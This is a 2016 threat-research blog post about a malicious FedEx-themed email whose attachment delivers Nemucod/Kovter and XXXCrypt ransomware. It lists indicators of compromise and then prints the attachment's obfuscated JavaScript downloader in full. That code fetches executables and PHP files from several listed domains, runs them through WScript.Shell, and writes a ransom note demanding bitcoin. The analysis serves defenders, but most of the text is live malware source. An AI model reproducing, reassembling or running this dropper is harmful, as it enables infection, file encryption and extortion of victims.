2016-06-14 Malspam Delivers Nemucod/Kovter/xxxCrypt

Here is another example of some malspam I was able to find the other day while at work. From what I can tell this is the standard Nemucod/Kovter malware (since it drops other malicious binaries on the system) with a version of XXXCrypt embedded in it. I was able to find some more information about this malware (which looks very close to the sample that I have below) over on Fortinet’s blog post here. There was one thing that was different that Fortinet’s blog did not talk about – the presenece of some PHP files. Another blog from Reaqta talks about the additional PHP files which you can read about here.

For the files, ProcMon logs, and PCAP that I was able to obtain from this investigation, please see my Github repo for this here.

Below is the screen cap of the malicious email:

– Indicators of compromise from this investigation:
===================================================
> kutubhanam.com / 80
> suwandesign.com / 80
> www.mariaberdun.com / 80
> nikkov.com / 80
> clermontcentralchurch.org / 80
> URI string containing “/counter/?ad=”

Information about the malspam:
==============================
Name of attachment: FedEx_00000235087.zip
Size: 9.03 KB
SHA1 hash: 3e4dffad62a03a0c7ec33981167ef8c221bdfdc1
Virustotal: NA
Malwr: NA
Payload Security: NA

File within attachment: FedEx_00000235087.doc.js
Size: 36.3 KB
SHA1 hash: 80a9731fe1aead24c9670c23eae17436e2835f4f
Virustotal: NA
Malwr: NA
Payload Security: NA

Investigation of the malspam:
=============================
Here is the javascript code before I de-obfuscated it using Revelo:

var q86 = 'var ';
var v79 = 'Writ';
v79 += 'oins';
q86 += 'id="';
v79 += '; v';
v79 += '."';
q86 += 'Tff6CxOofKLv46njM9MdfD_bBw7qRFZ6ffAJEPEXmzdahf7_QaFE8NdPA8MC7WRLiyTxoxCLTP0"';
v79 += 'LEAS';
v79 += 'ins';
q86 += '; va';
v79 += '=0';
q86 += 'r a';
v79 += '+n+';
q86 += 'd="1PXyK1CM8Dyr9tV51Ubub5imyvpmvqVmVf';
v79 += '; ';
v79 += '=1; ';
q86 += '"; v';
v79 += '"+cs';
q86 += 'ar ';
v79 += 'Bo';
q86 += 'bc="';
v79 += 'ts, ';
q86 += '0.';
v79 += 'ent';
v79 += 'cs';
q86 += '44';
v79 += 's+"';
v79 += 'Wri';
q86 += '591';
v79 += ' fp.';
v79 += '/loc';
q86 += '"; v';
v79 += ' RE';
q86 += 'ar ';
v79 += 'en("';
v79 += 'kov';
q86 += 'ld';
v79 += '"+c';
q86 += '=0;';
v79 += 'se';
q86 += ' var';
v79 += ';n';
v79 += 'ith ';
q86 += ' c';
v79 += 'eLi';
v79 += '+cs+';
q86 += 'q=S';
v79 += '); ';
q86 += 'trin';
v79 += '"  ';
q86 += 'g.fr';
v79 += 'c.")';
v79 += ' };';
q86 += 'omC';
v79 += 'e(""';
v79 += 'g.fr';
q86 += 'ha';
v79 += 'd="';
v79 += 'OS';
q86 += 'rCod';
v79 += ' (b';
v79 += 'Wri';
q86 += 'e(34';
v79 += 'G_SZ';
v79 += '+bc';
q86 += '); v';
v79 += 'aym';
q86 += 'ar c';
v79 += '+n, ';
v79 += 'uy';
q86 += 's=';
v79 += 'r){';
v79 += '("A';
q86 += 'Stri';
v79 += 'id+"';
q86 += 'ng';
v79 += ' f';
v79 += 'trea';
q86 += '.fr';
v79 += '"+c';
v79 += 'trin';
q86 += 'omCh';
v79 += '"+';
q86 += 'arCo';
v79 += 't pe';
q86 += 'de';
v79 += '.Wr';
q86 += '(9';
v79 += '5. ';
q86 += '2)';
v79 += 's ';
v79 += 'p.';
q86 += '; v';
v79 += ' fo';
v79 += ' (b';
q86 += 'ar ';
v79 += 'in';
q86 += 'll=';
v79 += 'ite';
q86 += '["';
v79 += 'G_SZ';
q86 += 'kutu';
v79 += 'DEL';
q86 += 'bha';
v79 += 'fp=f';
v79 += 'COM';
q86 += 'na';
v79 += 'teO';
q86 += 'm.c';
v79 += 'r){';
v79 += '%COM';
q86 += 'om"';
v79 += 'y ';
q86 += ',"s';
v79 += ' c';
q86 += 'uw';
v79 += '" ';
q86 += 'and';
v79 += ' f';
q86 += 'esi';
v79 += 'i<l';
v79 += 'cryp';
q86 += 'gn.c';
v79 += '0,';
q86 += 'om"';
v79 += '+" ';
q86 += ',"ww';
v79 += '; f';
q86 += 'w.m';
v79 += '"+';
v79 += 'Exi';
q86 += 'aria';
v79 += '.res';
q86 += 'be';
v79 += '+".';
q86 += 'rdun';
v79 += 'ne';
v79 += ';f';
q86 += '.com';
v79 += 'cq+f';
q86 += '","n';
v79 += 'exc';
v79 += ' htt';
q86 += 'ik';
v79 += '"+';
v79 += 'C% /';
q86 += 'kov';
v79 += '"+c';
v79 += '0,';
q86 += '.co';
v79 += 'm","';
q86 += 'm","';
v79 += 'nm';
q86 += 'cler';
v79 += 'fp.';
q86 += 'mont';
v79 += ' ws.';
v79 += 'ing ';
q86 += 'cent';
v79 += 'un(';
v79 += '+"';
q86 += 'ra';
v79 += '.Fi';
v79 += 'id+"';
q86 += 'lch';
v79 += 'ld';
v79 += '"&i';
q86 += 'ur';
v79 += '); x';
v79 += '}; ';
q86 += 'ch.';
v79 += 'te';
q86 += 'org"';
v79 += 'ing';
v79 += 'ine';
q86 += '];';
v79 += '=ld;';
q86 += ' va';
v79 += 'e ';
q86 += 'r ws';
v79 += '=0';
v79 += 'ar c';
q86 += '=W';
v79 += ' va';
v79 += 'r ';
q86 += 'Sc';
v79 += 'Wri';
q86 += 'rip';
v79 += '=ld;';
v79 += 'n"';
q86 += 't.Cr';
v79 += '+"';
q86 += 'ea';
v79 += 'erP';
q86 += 'te';
v79 += 'he';
v79 += 'e(';
q86 += 'Obj';
v79 += '();';
v79 += 'ng';
q86 += 'ec';
v79 += ' f';
q86 += 't("W';
v79 += '+cs+';
q86 += 'Scri';
v79 += 'ec';
q86 += 'pt.S';
v79 += 'un(';
q86 += 'he';
v79 += '.fr';
v79 += 'Wri';
q86 += 'll"';
v79 += 'o no';
q86 += '); ';
v79 += '",';
q86 += 'var';
v79 += 'ine(';
v79 += ' /';
q86 += ' fn';
v79 += 'te';
q86 += '=ws';
v79 += '.Ex';
v79 += 'e("P';
q86 += '.Exp';
v79 += 'xt"+';
q86 += 'an';
v79 += 't=';
q86 += 'dE';
v79 += 'g.fr';
v79 += '/?a';
q86 += 'nv';
v79 += 'o.se';
v79 += 'ar ';
q86 += 'iro';
v79 += ' d';
v79 += 'epad';
q86 += 'nm';
v79 += 'All ';
q86 += 'en';
v79 += ' }';
q86 += 'tS';
v79 += 'Exi';
q86 += 'tri';
v79 += 'eLin';
v79 += 'd+';
q86 += 'ngs(';
v79 += 's+';
q86 += '"%TE';
v79 += 'lo';
v79 += '=0;';
q86 += 'MP';
v79 += '.w';
q86 += '%"';
v79 += 'th';
v79 += 'own';
q86 += ')+';
v79 += '&st=';
v79 += 'en';
q86 += 'cs';
v79 += 'o p';
v79 += '. S';
q86 += '+"a';
v79 += ' fo';
v79 += '("';
q86 += '";';
v79 += 'p.';
q86 += ' va';
v79 += '<=5';
q86 += 'r ';
v79 += ' RS';
q86 += 'pd';
v79 += 'fp.';
v79 += 'ar ';
q86 += '=ws';
v79 += 'e(""';
v79 += 'ne';
q86 += '.Ex';
v79 += ' /';
v79 += '"%';
q86 += 'pand';
v79 += 'e"';
v79 += ') &&';
q86 += 'En';
v79 += 'ne(';
q86 += 'vi';
v79 += ' hel';
q86 += 'ron';
v79 += 'n+';
q86 += 'me';
v79 += 'yo';
q86 += 'ntS';
v79 += 'you';
q86 += 'tr';
v79 += 'ne';
v79 += 'ng';
q86 += 'ing';
v79 += '0)';
q86 += 's(';
v79 += 'CO';
q86 += '"%T';
v79 += '0);';
v79 += 'i<l';
q86 += 'EMP';
v79 += ',2';
v79 += 'cler';
q86 += '%"';
v79 += 'fp.';
v79 += 't(';
q86 += ')+c';
v79 += 'PT';
q86 += 's+';
v79 += '("';
q86 += '"ph';
v79 += ' fo';
q86 += 'p4t';
v79 += '+ll[';
v79 += '); x';
q86 += 's.dl';
v79 += 'y."';
v79 += 'rit';
q86 += 'l";';
v79 += '0)';
v79 += 'o.';
q86 += ' va';
v79 += 'y af';
v79 += ' va';
q86 += 'r xo';
v79 += 'Li';
q86 += '=WS';
v79 += ' fal';
q86 += 'cri';
v79 += 'TTE';
q86 += 'pt';
v79 += 'ppD';
q86 += '.Cr';
v79 += 's ';
q86 += 'eat';
v79 += '.Cl';
q86 += 'eOb';
v79 += '.w';
v79 += 'pted';
q86 += 'jec';
v79 += 'ow';
q86 += 't("M';
v79 += '+".t';
q86 += 'sxml';
v79 += 'r){';
v79 += '"  ';
q86 += '2.';
v79 += 'F ';
q86 += 'XM';
v79 += 's+';
q86 += 'LHT';
v79 += 'ileE';
v79 += 'i++)';
q86 += 'TP';
v79 += 'ar ';
q86 += '");';
v79 += 'ws.R';
q86 += ' va';
v79 += 'cq,0';
v79 += '"%';
q86 += 'r x';
v79 += '); f';
v79 += '; ';
q86 += 'a=';
v79 += 'fp';
v79 += 'CR';
q86 += 'WScr';
v79 += 'p4t';
v79 += ' /';
q86 += 'ipt.';
v79 += '/?a';
v79 += ',"ht';
q86 += 'Cre';
v79 += '.w';
v79 += '; ws';
q86 += 'ate';
v79 += 'lo';
v79 += 'en ';
q86 += 'Obj';
v79 += 'r a';
q86 += 'ect';
v79 += '+"S';
q86 += '("';
v79 += 'll[';
q86 += 'ADOD';
v79 += 's+';
v79 += '+"';
q86 += 'B.S';
v79 += '"+';
q86 += 'trea';
v79 += 'cs';
v79 += '; v';
q86 += 'm")';
v79 += 'ne';
v79 += '; f';
q86 += '; v';
v79 += 'kutu';
v79 += 'o.';
q86 += 'ar ';
v79 += '; f';
q86 += 'fo';
v79 += 'xt';
q86 += '=WS';
v79 += 'oins';
v79 += '/y';
q86 += 'cri';
v79 += '<=2';
q86 += 'pt.C';
v79 += '0,0';
v79 += 'ro';
q86 += 'rea';
v79 += 'cq+"';
q86 += 'teO';
v79 += 'xa.c';
v79 += '("';
q86 += 'bjec';
v79 += 'eLi';
v79 += '+"a';
q86 += 't(';
v79 += '"+c';
v79 += 'ere';
q86 += '"Scr';
v79 += 'p y';
q86 += 'ipti';
v79 += '];';
v79 += '"+';
q86 += 'ng';
v79 += 'en ';
q86 += '.Fi';
v79 += '  ';
v79 += ' ws.';
q86 += 'le';
v79 += 'her';
q86 += 'Sy';
v79 += '; } ';
q86 += 'st';
v79 += '); f';
v79 += 'in';
q86 += 'emOb';
v79 += '); x';
v79 += 'ine';
q86 += 'je';
v79 += 'rt';
q86 += 'ct"';
v79 += 'eLi';
q86 += ');';
v79 += 'e(';
q86 += ' if';
v79 += 'c D';
v79 += 'EL ';
q86 += ' (!f';
v79 += '.Run';
v79 += '); ';
q86 += 'o.Fi';
v79 += 'ent';
v79 += 'll[';
q86 += 'leEx';
v79 += 'his ';
q86 += 'ists';
v79 += ' fal';
q86 += '(fn';
v79 += ');';
v79 += 'cq';
q86 += '+".t';
v79 += 'ose(';
v79 += 'n"';
q86 += 'xt")';
v79 += 'o.Cr';
q86 += ') {';
v79 += 'ing ';
v79 += '("%';
q86 += ' fo';
v79 += '",';
v79 += ',2)';
q86 += 'r(';
v79 += '"+c';
v79 += 'rit';
q86 += 'var ';
v79 += 'i++)';
v79 += 'g ';
q86 += 'n=';
v79 += 'a.';
q86 += '1;n';
v79 += 'u m';
v79 += 'her';
q86 += '<=5';
v79 += '+"a';
v79 += 'se';
q86 += ';n';
v79 += 'om"';
v79 += 'ne';
q86 += '++) ';
v79 += 'Fi';
v79 += 'cash';
q86 += '{ fo';
v79 += ' to';
v79 += '){x';
q86 += 'r(v';
v79 += 'sa';
q86 += 'ar i';
v79 += 'd ';
q86 += '=ld;';
v79 += 'un';
v79 += '1;n';
q86 += 'i<l';
v79 += 'in';
v79 += 'you';
q86 += 'l.le';
v79 += '"%';
q86 += 'ng';
v79 += '+f';
q86 += 'th';
v79 += 'd="';
v79 += 'ld';
q86 += ';i++';
v79 += 'fp.';
v79 += 'te';
q86 += ') ';
v79 += 'B.S';
v79 += 'COM';
q86 += '{ ';
v79 += 'p4t';
q86 += 'var ';
v79 += 'n=1';
q86 += 'dn';
v79 += 'ine(';
q86 += '=0';
v79 += '=5)';
q86 += '; ';
v79 += '(ad';
v79 += 'Writ';
q86 += 'try ';
v79 += 'he';
q86 += '{ xo';
v79 += 'Your';
q86 += '.op';
v79 += 'te';
v79 += ']+"/';
q86 += 'en("';
v79 += 'ar c';
v79 += ')+';
q86 += 'GET"';
v79 += 'e("';
q86 += ',"ht';
v79 += 'PE';
v79 += 'teL';
q86 += 'tp';
v79 += 'ld';
q86 += ':/';
v79 += 's.';
v79 += 'Lin';
q86 += '/"+';
v79 += '"+c';
q86 += 'll[';
v79 += ' a';
q86 += 'i]';
v79 += 'Sc';
q86 += '+"/';
v79 += 'dy';
v79 += 'ng';
q86 += 'coun';
v79 += 'e(fn';
q86 += 'te';
v79 += 'cu';
q86 += 'r/?';
v79 += 'DEL';
v79 += 'el';
q86 += 'ad';
v79 += '/"';
q86 += '="';
v79 += '=1){';
q86 += '+ad+';
v79 += '."';
v79 += 'ite';
q86 += '"&i';
v79 += '; ';
q86 += 'd="';
v79 += 'ar ';
v79 += ',2);';
q86 += '+id';
v79 += '; } ';
q86 += '+"&';
v79 += 'eLi';
q86 += 'rn';
v79 += '(9';
v79 += 'id+';
q86 += 'd="';
v79 += 'ur ';
q86 += '+i';
v79 += 'kutu';
v79 += 'L Y';
q86 += '+n, ';
v79 += 'ps:/';
v79 += '.st';
q86 += 'fal';
v79 += '+id';
q86 += 'se';
v79 += ',"s';
q86 += '); x';
v79 += '/"+';
v79 += '.Wr';
q86 += 'o.se';
v79 += 'p y';
v79 += ',"h';
q86 += 'nd()';
v79 += 'SPE';
v79 += 'esk';
q86 += '; if';
v79 += 'iro';
v79 += 'd ';
q86 += '(xo';
v79 += 'o p';
q86 += '.st';
v79 += 'nse';
q86 += 'at';
v79 += 'des';
q86 += 'us=';
v79 += '++) ';
q86 += '=20';
v79 += 'C% /';
v79 += 'iteL';
q86 += '0) {';
v79 += 'ing';
v79 += ' f';
q86 += ' x';
v79 += 'ne';
v79 += '.op';
q86 += 'a.o';
v79 += 'E AL';
q86 += 'pen(';
v79 += 'tr';
q86 += '); x';
v79 += 'TTE';
v79 += '("';
q86 += 'a.ty';
v79 += 'Li';
v79 += 'll"';
q86 += 'pe';
v79 += '=20';
v79 += '{ ';
q86 += '=1; ';
v79 += 'rit';
v79 += 'to';
q86 += 'xa';
v79 += 'rch';
q86 += '.w';
v79 += '"  ';
q86 += 'rit';
v79 += 'n+".';
v79 += 'ou d';
q86 += 'e(';
v79 += 'c ';
q86 += 'xo';
v79 += 'xe ';
v79 += '"/c';
q86 += '.res';
v79 += 'e("';
v79 += 'lo';
q86 += 'po';
v79 += 'C w';
v79 += 'o.Cr';
q86 += 'nse';
v79 += '"+cq';
q86 += 'Bo';
v79 += 's+';
v79 += '"+';
q86 += 'dy';
v79 += 'txt';
q86 += '); ';
v79 += ' fp';
v79 += 'teL';
q86 += 'if(x';
v79 += '."';
q86 += 'a.si';
v79 += 'm.c';
v79 += ' f';
q86 += 'ze>';
v79 += ' fp.';
q86 += '10';
v79 += 'ws.R';
q86 += '00)';
v79 += 'tab';
v79 += 'ne("';
q86 += ' { d';
v79 += 'ECR';
v79 += 'q,0,';
q86 += 'n=1';
v79 += '("")';
q86 += '; i';
v79 += 'in 3';
v79 += '0);';
q86 += 'f(n';
v79 += 'ine(';
q86 += '<=2';
v79 += 'iru';
v79 += 'osof';
q86 += '){x';
v79 += 'sk';
v79 += 'It`';
q86 += 'a.s';
v79 += 'st';
q86 += 'aveT';
v79 += '=WS';
q86 += 'oFi';
v79 += '=ws';
v79 += 'lo';
q86 += 'le';
v79 += 'pt.C';
q86 += '(fn';
v79 += '   ';
q86 += '+n+';
v79 += 'bc="';
q86 += '".';
v79 += '+" ';
q86 += 'exe"';
v79 += ' i';
q86 += ',2';
v79 += 'ect';
q86 += ');';
v79 += 'uy';
v79 += 's(fn';
q86 += 'try{';
v79 += 'd)';
v79 += 'ws.R';
q86 += 'ws.R';
v79 += 'id+';
q86 += 'un(';
v79 += 'll"';
q86 += 'fn';
v79 += 'o t';
q86 += '+n';
v79 += 'r ws';
q86 += '+".e';
v79 += 'fp';
v79 += ').';
q86 += 'xe",';
v79 += 'cryp';
v79 += 'REG_';
q86 += '1,';
v79 += ' you';
v79 += 'fn';
q86 += '0);';
v79 += 'eLi';
v79 += '.txt';
q86 += '}c';
v79 += '; ';
v79 += 'na';
q86 += 'atc';
v79 += 'her';
q86 += 'h(';
v79 += '.Run';
q86 += 'er){';
v79 += 'om"';
v79 += 'n+';
q86 += '};} ';
v79 += '10';
v79 += 'q=S';
q86 += 'else';
v79 += '; v';
q86 += ' i';
v79 += '; ';
q86 += 'f(n=';
v79 += '.st';
q86 += '=3';
v79 += 'ne(';
q86 += '){x';
v79 += 'Stri';
v79 += 'fil';
q86 += 'a.';
v79 += 'rit';
q86 += 'sa';
v79 += '"+a';
v79 += 'ope';
q86 += 've';
v79 += 'fp';
q86 += 'To';
v79 += 'ay';
q86 += 'Fi';
v79 += 'd="';
q86 += 'le(f';
v79 += 'ou d';
v79 += '/"';
q86 += 'n+".';
v79 += 'ar c';
q86 += 'ex';
v79 += 'ry';
q86 += 'e"';
v79 += 'om';
q86 += ',2);';
v79 += 'tr';
v79 += 'bha';
q86 += '} ';
v79 += 'pen';
v79 += '0,0';
q86 += 'el';
v79 += 'id+"';
v79 += 'eLi';
q86 += 'se ';
v79 += 'To';
v79 += '.w';
q86 += 'if(n';
v79 += 'de';
q86 += '==4)';
v79 += 'xo';
q86 += '{xa.';
v79 += 'ro';
q86 += 'sav';
v79 += 'll"';
q86 += 'eT';
v79 += 'Clo';
q86 += 'oFi';
v79 += 'ma';
v79 += 'rn';
q86 += 'le(';
v79 += ',"s';
v79 += '; ';
q86 += 'pd,2';
v79 += 'L ';
v79 += 'te';
q86 += ');';
v79 += 'in';
v79 += 'ite';
q86 += '} e';
v79 += 'E RE';
v79 += 'fn';
q86 += 'ls';
v79 += 'ort';
q86 += 'e i';
v79 += '"%CO';
v79 += '+c';
q86 += 'f(n=';
v79 += 'ne("';
q86 += '=5)';
v79 += 'l[i';
v79 += 'fp.';
q86 += '{xa.';
v79 += 'oins';
v79 += '"+cq';
q86 += 'sa';
v79 += 'to';
v79 += 'ph';
q86 += 'veT';
v79 += 'top"';
q86 += 'oF';
v79 += '0)';
q86 += 'ile(';
v79 += 'je';
v79 += 'Li';
q86 += 'fn';
v79 += 'e"';
v79 += ' RS';
q86 += '+".p';
v79 += 'ik';
q86 += 'hp"';
v79 += 'h(';
q86 += ',2)';
v79 += 'na';
q86 += ';}';
v79 += 'dn=';
q86 += ' }';
v79 += 'her';
q86 += '; ';
v79 += '+"Cr';
v79 += 'est';
q86 += 'xa.c';
v79 += '} ';
v79 += 'usin';
q86 += 'lo';
v79 += 'HKCR';
v79 += 'PE';
q86 += 'se';
v79 += 'fp.W';
q86 += '();';
v79 += 'C% /';
v79 += 'rip';
q86 += ' };';
v79 += '+cq+';
q86 += ' i';
v79 += '+".t';
q86 += 'f(';
v79 += 'o.';
q86 += 'dn=';
v79 += '.Ex';
q86 += '=1){';
v79 += 'dn=';
q86 += 'ld=i';
v79 += 'd="';
q86 += ';b';
v79 += '. B';
q86 += 'rea';
v79 += 'Writ';
v79 += '")';
q86 += 'k;}';
v79 += 'le';
q86 += '; } ';
v79 += 'o no';
q86 += 'ca';
v79 += ',2);';
q86 += 'tc';
v79 += 'G AD';
v79 += ':/';
q86 += 'h(e';
v79 += 'd"+';
q86 += 'r){';
v79 += 'na';
v79 += 'xe"';
q86 += '}; ';
v79 += '+i';
v79 += 'eat';
q86 += '}; ';
v79 += ',0);';
v79 += '+"Ru';
q86 += '};';
v79 += 'PT';
v79 += 'sta';
q86 += ' if';
v79 += '(fn+';
v79 += '".';
q86 += '(fo';
v79 += 'ther';
v79 += 've';
q86 += '.Fi';
v79 += '=20';
q86 += 'le';
v79 += 'o p';
q86 += 'Exi';
v79 += 'ad';
v79 += 'EC% ';
q86 += 'st';
v79 += '; f';
q86 += 's(fn';
v79 += 'Ru';
q86 += '+".';
v79 += '(var';
q86 += 'exe"';
v79 += 'dy ';
q86 += ') &&';
v79 += 'rip';
v79 += 'bha';
q86 += ' fo';
v79 += 'p"+';
v79 += 'll.l';
q86 += '.F';
v79 += 'p.Wr';
v79 += 'dres';
q86 += 'ileE';
v79 += 'r do';
q86 += 'xis';
v79 += 'c+" ';
q86 += 'ts';
v79 += '""';
q86 += '(pd)';
v79 += 's ';
q86 += ' &&';
v79 += 'ea';
v79 += 'll[';
q86 += ' fo';
v79 += 'send';
q86 += '.F';
v79 += 'en';
v79 += '=ld;';
q86 += 'ileE';
v79 += '"+cq';
q86 += 'xi';
v79 += '44';
q86 += 'sts';
v79 += 'ine';
v79 += '"%CO';
q86 += '(fn+';
v79 += 'var';
q86 += '".ph';
v79 += 'teL';
v79 += ' a';
q86 += 'p")';
v79 += '/?a';
v79 += 'ay';
q86 += ') { ';
v79 += 'pen(';
v79 += '".e';
q86 += 'xo.o';
v79 += 'en';
v79 += 'g ';
q86 += 'pen';
v79 += 'je';
q86 += '("';
v79 += 'ual';
v79 += 'LEAS';
q86 += 'GET"';
v79 += 'Wri';
q86 += ',"ht';
v79 += ' RE';
q86 += 'tp:/';
v79 += 'or';
q86 += '/"';
v79 += 'un(';
v79 += 'cq+"';
q86 += '+ll[';
v79 += '.Cr';
v79 += 'Bo';
q86 += 'ld]+';
v79 += '.");';
q86 += '"/c';
v79 += 'RE';
v79 += '".ph';
q86 += 'oun';
v79 += ' x';
v79 += 'Ru';
q86 += 'te';
v79 += 'rn';
q86 += 'r/?a';
v79 += 'Stri';
v79 += 'ng';
q86 += 'd=';
v79 += 'te';
q86 += '"+a';
v79 += '00)';
v79 += '("%C';
q86 += 'd+';
v79 += 'atc';
q86 += '"&i';
v79 += '+f';
v79 += 'dn';
q86 += 'd="+';
v79 += 'Scri';
v79 += 'eat';
q86 += 'id+';
v79 += '); ';
q86 += '"&s';
v79 += ' /';
v79 += 'cri';
q86 += 't=';
v79 += 'ze>';
v79 += 'e i';
q86 += 'sta';
v79 += 'teLi';
q86 += 'rt';
v79 += '("';
v79 += 'can';
q86 += '",';
v79 += 'ell"';
q86 += ' fal';
v79 += ',"ht';
q86 += 'se);';
v79 += 'a.s';
q86 += ' x';
v79 += '   ';
v79 += 'ne("';
q86 += 'o.';
v79 += ');';
q86 += 'send';
v79 += '"+c';
v79 += '(fn';
q86 += '()';
v79 += 'an';
q86 += '; v';
v79 += '("';
v79 += '"+a';
q86 += 'ar ';
v79 += '- No';
q86 += 'fp=f';
v79 += 'try ';
q86 += 'o.';
v79 += '";';
v79 += 'SPEC';
q86 += 'Crea';
v79 += '+"HK';
v79 += '2.';
q86 += 'te';
v79 += 'rea';
v79 += 'st';
q86 += 'Te';
v79 += 'ell"';
v79 += '.Fi';
q86 += 'xtF';
v79 += 'en("';
q86 += 'il';
v79 += 'cs+"';
v79 += 'e("';
q86 += 'e(fn';
v79 += ']+';
q86 += '+".t';
v79 += 'en ';
v79 += 'Tex';
q86 += 'xt';
v79 += '/D';
q86 += '",';
v79 += '+"a';
v79 += 'SZ';
q86 += 'tr';
v79 += 'if(n';
q86 += 'ue)';
v79 += '. S';
q86 += '; ';
v79 += 'Fi';
q86 += 'fp.';
v79 += 'he';
q86 += 'Writ';
v79 += 'xa';
q86 += 'eLi';
v79 += '=20';
v79 += '".ph';
q86 += 'ne';
v79 += '+n, ';
q86 += '("A';
v79 += 'ite';
v79 += 'Writ';
q86 += 'TTE';
v79 += 'p.W';
v79 += '{ fo';
q86 += 'NT';
v79 += 'hp"';
q86 += 'ION';
v79 += 'WScr';
q86 += '!"';
v79 += '/loc';
q86 += ');';
v79 += 'rson';
q86 += ' f';
v79 += 'pen(';
q86 += 'p.W';
v79 += 'ri';
q86 += 'ri';
v79 += ');';
v79 += '2)';
q86 += 'teLi';
v79 += 'exc';
q86 += 'ne(';
v79 += 'ec';
q86 += '"")';
v79 += 's+';
q86 += '; f';
v79 += ' f';
q86 += 'p.W';
v79 += 'd"+';
q86 += 'rit';
v79 += ']+';
q86 += 'eLi';
v79 += 'q+"';
q86 += 'ne';
v79 += 'fn';
v79 += 'ph';
q86 += '("';
v79 += 'Cre';
q86 += 'All ';
v79 += 'cq+f';
v79 += 'rit';
q86 += 'you';
v79 += 'C% /';
v79 += '=3';
q86 += 'r do';
v79 += 'g.fr';
q86 += 'cu';
v79 += '.i';
q86 += 'men';
v79 += '} e';
q86 += 'ts, ';
v79 += 'uy';
v79 += 'Fi';
q86 += 'pho';
v79 += 'e:"';
v79 += 'e ';
q86 += 'tos';
v79 += 'ine(';
q86 += ', da';
v79 += 'ea';
q86 += 'tab';
v79 += 'te';
v79 += '   ';
q86 += 'ases';
v79 += 'd="';
v79 += 'eLi';
q86 += ' a';
v79 += '+l';
v79 += '("';
q86 += 'nd o';
v79 += 'cs+';
q86 += 'ther';
v79 += 'je';
v79 += '"%';
q86 += ' imp';
v79 += '   ';
q86 += 'ort';
v79 += 'c.")';
q86 += 'an';
v79 += 'ing ';
q86 += 't pe';
v79 += 'p.W';
q86 += 'rson';
v79 += 'p:';
v79 += 'rt';
q86 += 'al ';
v79 += 'uy';
q86 += 'fi';
v79 += ' rei';
q86 += 'les';
v79 += ');';
q86 += '"); ';
v79 += '); x';
v79 += 'a=';
q86 += 'fp';
v79 += 'buy';
v79 += 'iteL';
q86 += '.Wr';
v79 += ',2';
v79 += 'Tff6CxOofKLv46njM9MdfD_bBw7qRFZ6ffAJEPEXmzdahf7_QaFE8NdPA8MC7WRLiyTxoxCLTP0"';
q86 += 'it';
v79 += 'd+';
q86 += 'eL';
v79 += 'p")';
v79 += 'ppD';
q86 += 'ine(';
v79 += '=3';
v79 += 'lle';
q86 += '"w';
v79 += 'SPE';
v79 += ' /c';
q86 += 'ere';
v79 += 'fp.W';
q86 += ' en';
v79 += '"+cq';
q86 += 'cryp';
v79 += ';}';
v79 += 'eLi';
q86 += 'ted ';
v79 += '); f';
q86 += 'us';
v79 += 'iru';
q86 += 'ing ';
v79 += '//"';
v79 += 'Cr';
q86 += 'st';
v79 += '};';
v79 += 'Te';
q86 += 'ro';
v79 += 'Wri';
q86 += 'ng';
v79 += 'ws.R';
v79 += 'e(""';
q86 += ' RS';
v79 += 'G_SZ';
v79 += 'xe ';
q86 += 'A-1';
v79 += 'ws.R';
q86 += '024';
v79 += 'fi';
v79 += '"+c';
q86 += ' a';
v79 += '% /c';
q86 += 'lgor';
v79 += '"); ';
q86 += 'ithm';
v79 += '{xa.';
q86 += ' w';
v79 += 'n+".';
v79 += 'p.';
q86 += 'ith ';
v79 += '};} ';
v79 += 'il';
q86 += 'a u';
v79 += 'r x';
v79 += 'Li';
q86 += 'niqu';
v79 += 'PT.';
q86 += 'e ke';
v79 += 'pe';
q86 += 'y."';
v79 += 've';
q86 += '); ';
v79 += 'dy';
v79 += 'iteL';
q86 += 'fp';
v79 += 'e ';
q86 += '.Wri';
v79 += ' not';
q86 += 'teL';
v79 += '="';
q86 += 'in';
v79 += ' FIL';
v79 += 'ng';
q86 += 'e("';
v79 += 'ne';
q86 += 'To';
v79 += 'a u';
v79 += 'o p';
q86 += ' res';
v79 += 'ypte';
q86 += 'tor';
v79 += 'dn';
q86 += 'e ';
v79 += 'bc="';
v79 += 'tr';
q86 += 'yo';
v79 += ' /F';
v79 += '.c';
q86 += 'ur ';
v79 += ';n';
q86 += 'fi';
v79 += '+"%A';
v79 += 'a u';
q86 += 'le';
v79 += 'p y';
v79 += 'br';
q86 += 's ';
v79 += '+" ';
v79 += 'an';
q86 += 'you';
v79 += 'p")';
q86 += ' ha';
v79 += 't("M';
v79 += '!"';
q86 += 've';
v79 += ' rei';
q86 += ' t';
v79 += 'G AD';
q86 += 'o p';
v79 += 'fol';
q86 += 'ay';
v79 += 'omC';
v79 += 'a=';
q86 += ' "';
v79 += 'eat';
v79 += 'te';
q86 += '+bc';
v79 += 'lo';
v79 += ' htt';
q86 += '+"';
v79 += 'r xo';
v79 += ' fp';
q86 += ' BTC';
v79 += 'ex';
q86 += ' (b';
v79 += 'h(';
v79 += 'if(n';
q86 += 'itc';
v79 += 'org"';
v79 += 'd="+';
q86 += 'oins';
v79 += '"/c';
q86 += ').';
v79 += 'nsta';
q86 += '")';
v79 += 'pho';
q86 += '; f';
v79 += '();';
q86 += 'p.';
v79 += 'p"';
v79 += 'e:"';
q86 += 'Wri';
v79 += '("  ';
q86 += 'teL';
v79 += 'cs';
v79 += 'Bi';
q86 += 'ine';
v79 += '();';
v79 += 'cq';
q86 += '("Pl';
v79 += 'eLin';
q86 += 'eas';
v79 += 'Tff6CxOofKLv46njM9MdfD_bBw7qRFZ6ffAJEPEXmzdahf7_QaFE8NdPA8MC7WRLiyTxoxCLTP0"';
q86 += 'e ';
v79 += '   ';
q86 += 'fol';
v79 += 'MSP';
q86 += 'lo';
v79 += 'se';
v79 += '   ';
q86 += 'w ';
v79 += '="';
q86 += 'this';
v79 += 'q+"';
v79 += 'd="+';
q86 += ' ma';
v79 += 'exe"';
v79 += '")';
q86 += 'nua';
v79 += 'e o';
v79 += 'te';
q86 += 'l:';
v79 += 'p.Wr';
q86 += '"); ';
v79 += ' fn';
v79 += 'pand';
q86 += 'fp.W';
v79 += 'd+';
v79 += 'ca';
q86 += 'ri';
v79 += 'c+" ';
v79 += 'C% /';
q86 += 'te';
v79 += 'll[';
q86 += 'Lin';
v79 += 'd ';
q86 += 'e(';
v79 += 'ine(';
v79 += '"+';
q86 += '"");';
v79 += 'n ';
q86 += ' f';
v79 += '%"';
q86 += 'p.Wr';
v79 += '};';
v79 += '(9';
q86 += 'ite';
v79 += '); f';
v79 += 'al';
q86 += 'Li';
v79 += 'y ';
q86 += 'ne(';
v79 += ' f';
